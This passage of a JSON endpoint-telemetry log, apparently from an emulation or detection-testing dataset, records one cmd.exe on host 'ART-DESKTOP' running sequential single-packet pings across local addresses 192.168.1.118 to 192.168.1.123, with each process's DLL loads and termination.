"{42FC7E13-CB87-5C05-0000-001040AD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": 
"{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572552140000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "event_type": "process", - "pid": 7172, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572556830000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-001040AD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.118", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7788, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572556980000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "event_type": "process", - "pid": 7788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572561990000, - "unique_pid": "{42FC7E13-CB87-5C05-0000-0010B0AF5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.119", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4884, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - 
"pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572562140000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "event_type": "process", - "pid": 4884, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572566830000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-001031B25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.120", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7800, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572566980000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7800, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572566990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "event_type": "process", - "pid": 7800, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572571990000, - "unique_pid": "{42FC7E13-CB88-5C05-0000-0010A1B45201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.121", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3288, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572572300000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "event_type": "process", - "pid": 3288, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572576990000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001021B75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.122", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 820, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 
131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "process", - "pid": 820, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572581830000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.123", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4944, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": 
"{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", 